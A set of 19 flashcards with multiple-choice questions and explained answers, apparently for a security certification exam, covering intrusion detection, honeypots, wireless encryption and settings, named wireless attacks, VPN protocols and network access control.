Use LEFT and RIGHT arrow keys to navigate between flashcards;
Use UP and DOWN arrow keys to flip the card;
H to show hint;
A reads text to speech;
19 Cards in this Set
- Front
- Back
|
Which of the following network tools includes sniffing capabilities? A. IDS B. WAP C. VPN D. NAC |
Correct Answer: A. Intrusion detection systems (IDS) and intrusion prevention system (IPSs) include sniffing capabilities allowing them to inspect packet streams for malicious activity. None of the other tools have the capability of inspecting packets. A wireless access point (WAP) provides access to a wired network for wireless devices. A virtual private network (VPN) provides access to an internal network for remote users. A network access control (NAC) system inspects clients to ensure they meet minimum security requirements. |
|
|
A HIDS reported a vulnerability on a system using an assigned vulnerability identification number. After researching the number on the vendor's web site, you identify the recommended solution and begin applying it. What type of HIDS is in use? A. Network-based B. Signature-based C. Heuristic-based D. Anomaly-based |
Correct Answer: B. If the issue has an assigned number, it must be known, so it is signature-based. A host-based intrusion detection system (HIDS) is not network-based. A heuristic-based (or anomaly-based detection system catches issues that are not previously known. |
|
|
Management is concerned about malicious activity on your network and wants to implement a security control that will detect unusual traffic on the network. Which of the following is the BEST choice to meet this goal? A. Network firewall B. Signature-based IDS C. Anomaly-based IDS D. Honeypot |
Correct Answer: C. An anomaly-based (also called heuristic or behavior-based) detection system compares current activity with a previously created baseline to detect any anomalies or changes. A network firewall blocks and allows traffic, but does not detect unusual traffic. Signature-based systems use signatures similar to anti-virus software. A honeypot is a server designed to look valuable to an attacker and can divert attacks. |
|
|
Administrators have noticed an increased workload recently. Which of the following can cause an increased workload from incorrect reporting? A. False Negatives B. False Positives C. Separation of duties D. Signature-based IDS |
Correct Answer: B. False positives can cause an increased workload because they falsely indicate an alert has occurred. A false negative doesn't report an actual attack, so it doesn't increase the workload because administrators are unaware of the attacks. Separation of duties ensures a singles person can't control an entire process, so it is unrelated to increased workload. Signature-based intrusion detection systems (IDSs) don't necessarily cause an increased workload unless they have a high incidence of false positives. |
|
|
A security company wants to identify and learn about current and new attack methodologies. Which of the following is the BEST choice to meet this objective. A. Pen test B. HIDS C. Honeypot D. Firewall logs |
Correct Answer: C. A honeypot is a server designed to look valuable to an attacker and can help administrators learn about zero-day exploits, or previously unknown attacks. Security personnel perform a pen test (or penetration test) to determine if attackers can exploit existing vulnerabilities, but attackers may not try to do so. A host-based intrusion detection system (HIDS) attempts to detect intrusions on an individual host, but may not catch new methods against the network. Firewall logs can log connections, but don't identify new attack methods.
|
|
|
Of the following choices, what can you use to divert malicious attacks on your network away from valuable data to worthless fabricated data? A. IPS B. Proxy Server C. Web application firewall D. Honeypot |
Correct Answer: D. A honeypot can divert malicious attacks to a harmless area of your network, such as away from production servers holding valid data. An intrusion prevention system (IPS) can block attacks, but it doesn't divert it. A proxy server can filter and cache content from web pages, but doesn't divert attacks. A web application firewall (WAF) is an additional firewall designed to protect a web application. |
|
|
Your network IDS recently detected an attack on a server. Upon investigation, you discover that the IDS does not have a signature on this attack. Instead, the IDS detected it using a heuristic analysis. Of the following choices, what is the MOST likely category of this attack? A. Definition B. CVE C. Zero-day D. Phishing |
Correct Answer: C. Heuristic analysis has the best chance of detecting a zero-day attacks. A zero-day attack is one that is unknown to vendors and because this attacks doesn't have a signature, it is most likely unknown. Definition-based intrusion detection systems (IDS) are the same as signature-based IDSs. Many signatures are based on the Common Vulnerabilities and Exposures (CVE) list. A phishing attack is an email, not an attack on a server. |
|
|
You need to provide connectivity between two buildings without running any cables. You decide to use two WAPs and a high-gain directional antenna. Which of the following antennas is the BEST choice to meet this need? A. Yagi B. Omni C. Isotropic D. Dipole |
Correct Answer: A. A Yagi antenna is a high-gain directional antenna with a very narrow radiation pattern and is an ideal choice for this scenario. An isotropic antenna is theoretical and indicates the signal goes in all directions equally. Omnidirectional and dipole antennas attempt to mimic an isotropic antenna, but have stronger gains horizontally then vertically, assuming they are standing vertically.
|
|
|
You are assisting a user in the implementation of a wireless network in his home. The wireless hardware he has requires the RC4 protocol. What type of security is BEST for this network? A. WEP B. WPA-TKIP C. WPA-AES D. WPA2 Enterprise |
Correct Answer: B. Temporal Key Integrity Protocol (TKIP) uses RC4 and is compatible with older hardware so Wi-Fi Protected Access (WPA) with TKIP is the best option for this network. Wired Equivalent Privacy (WEP) uses RC4, but it is not secure and should not be used. WPA with Advanced Encryption Standard (AES) is stronger, but is uses AES instead of RC4. Wi-Fi Protected Access II (WPA2). Enterprise requires an 802.1x server and does not use RC4.
|
|
|
You want to implement the STRONGEST level of security on a wireless network. Which of the following supports this goal? A. Implementing WEP B. Disabling SSID broadcast C. Enabling MAC filtering D. Implementing WPA2 |
Correct Answer: D. Wi-fi Protected Access II (WPA2) provides the strongest level of security of the available answers. Wired Equivalent Privacy (WEP) is weak and should not be used. Disabling service set identifier (SSID) broadcast hides the network from casual users, but attackers can still discover it because the SSID is still included in some packets in plaintext. Attackers can bypass media access control (MAC) address filtering by spoofing authorized MAC addresses.
|
|
|
You are planning to deploy a WLAN and you want to ensure it is secure. Which of the following provides the BEST security? A. WEP Enterprise B. WPA2 TKIP C. SSID broadcast D. WPA2 CCMP |
Correct Answer: D. Wi-Fi Protected Access II (WPA2) with Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) provides the best security of those listed. Wired Equivalent Privacy (WEP) is not secure and is not available in Enterprise mode. CCMP is stronger than Temporal Key Integrity Protocol (TKIP). Service set identifier (SSID) broadcast indicates that network name is broadcast, but this doesn't provide any security. If SSID broadcast is disabled, it hides the network from casual users, but attackers can still see it.
|
|
|
Your organization is planning to implement a wireless network during WPA2 Enterprise. Of the following choices, what is required? A. An authentication server with a digital certificate installed on the authentication server. B. An authentication server with DHCP installed on the authentication server. C. An authentication server with DNS installed on the authentication server. D. An authentication server with WEP running on the access point. |
Correct Answer: A. WPA2 Enterprise requires an 802.1x authentication server and most implementations require a digitial certificate installed on the server. The network will likely have Dynamic Host Configuration Protocol (DHCP) and Domain Name Systems (DNS) services, but it isn't necessary to install them on the authentication server. Wired Equivalent Privacy (WEP) provides poor security and is not compatible with WPA2 Enterprise.
|
|
|
You are assisting a small business owner in setting up a public wireless hot sport for her customers. Which of the following actions are MOST appropriate for this hot spot? A. Enabling Open System Authentication B. Enabling MAC filtering C. Disabling SSID broadcast D. Installing Yagi antennas |
Correct Answer: A . Open System Authentication is the best choice of those given for a public wireless hot spot. It is used with Wired Equivalent Privacy (WEP), doesn't require users to enter a preshared key or passphrase, and doesn't require the business owner to give out this information. It's also possible to disable security for the hot spot. Media access control (MAC) address filtering would be very difficult to maintain. Disabling service set identifier (SSID) broadcasting would make it difficult to find the wireless network, and installing a directional Yagi antenna isn't appropriate for a hot spot that needs an omnidirectional antenna.
|
|
|
Homer is able to connect to his company's wireless network with his smartphone but not with his laptop computer. Which of the following is the MOST likely reason for this disparity? A. His company's network has a MAC address filter in place. B. His company's network has enabled SSID broadcast C. His company's network has enabled CCMP D. His company's network has enabled WPA2 Enterprise. |
Correct Answer: A. A media access control (MAC) address filter allows (or blocks) devices based on their MAC addresses, so it is likely that the filter is allowing Homer's smartphone but no allowing his laptop computer. Enabling the service set identifier (SSID) makes the network easier to see by casual users, but it does not block access even if SSID broadcast is disabled. Wi-Fi protected Access II (WPA2) and Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) both provide strong security, but they do not differentiate between devices.
|
|
|
Management asks you if you can modify the wireless network to prevent users from easily discovering it. Which of the following would you modify to meet this goal? A. CCMP B. WPA2 Enterprise C. SSID broadcast D. MAC address filter |
Correct Answer: C. You can disable service set identifier (SSID) broadcasting to prevent users from easily discovering the wireless networks. None of the other methods hide the network. Counter Mode Cipher Block Chaining Message Authentication Authentication Protocol (CCMP) provides stronger security for Wi-Fi Protected Access II (WPA2) and WPA2 Enterprise adds authentication for a wireless network. Media access control (MAC) address filtering can restrict access to the wireless network. |
|
|
A war driver is capturing traffic from a wireless network. When an authorized client connects, the attackers is able to implement a brute force attack to discover the encryption key. What type of attack did this war driver use? A. WPS attack B. IV attack C. Packet injection D. WPA cracking |
Correct Answer: D. A Wi-Fi Protected Access (WPA) cracking attack captures traffic and then performs an offline brute force attack to discover the encryption key. Wi-Fi Protected Setup (WPS) attacks also used a brute force attack, but do not need to wait for an authorized client to connect. Initialization vector (IV) attacks often use packet injection techniques to generate more traffic in Wired Equivalent Privacy (WEP) attacks.
|
|
|
An attacker is able to access email contact lists on your smartphone. What type of attack is this? A. Bluesnarfing B. War Chalking C. War Driving D. Bluejacking |
Correct Answer: A. Attackers are able to access data (including email contact lists) on a smartphone in a bluesnarfing attack. War chalking is the practice of marking the location of wireless networks. War driving is the practice of looking for wireless networks, often by driving around. Bluejacking is the practice of sending unsolicited messages to other Bluetooth devices.
|
|
|
Your organization is planning to implement a VPN and wants to ensure it is secure. Which of the following protocols is the BEST choice to use with the VPN? A. HTTP B. SFTP C. IPsec D. PPTP |
Correct Answer: C. Internet Protocol secure (IPsec) is one of several protocols used to secure virtual private network (VPN) traffic. It is the best choice of the available answers. Hypertext Transfer Protocol (HTTP) doesn't provide any security. Secure File Transfer Protocol (SFTP) secure FTP transmissions but not VPNs. Point-to-Point Tunneling Protocol (PPTP) is an older protocol used with VPNs, but it is not as secure as IPsec. |
|
|
An automated process isolated a computer in a restricted VLAN because the process noticed the computer's antivirus definitions were not up to date. What is the name of this process? A. NFC B. NIPS C. NIDS D. NAC |
Correct Answer: D. Network access control is a group of technologies that can inspect systems and control their access to a network. In this scenario, NAC changed the computer's IP address to quarantine it is a restricted virtual local area network (LAN). Near field communications (NFC) refers to standards that allow mobile devices to communicate with each other and is not related to VLANs. Network-based intrusion prevention systems (NIPs) and network-based intrusion detection systems (NIDSs) protect a network from intrusions, but do not quarantine internal systems. |
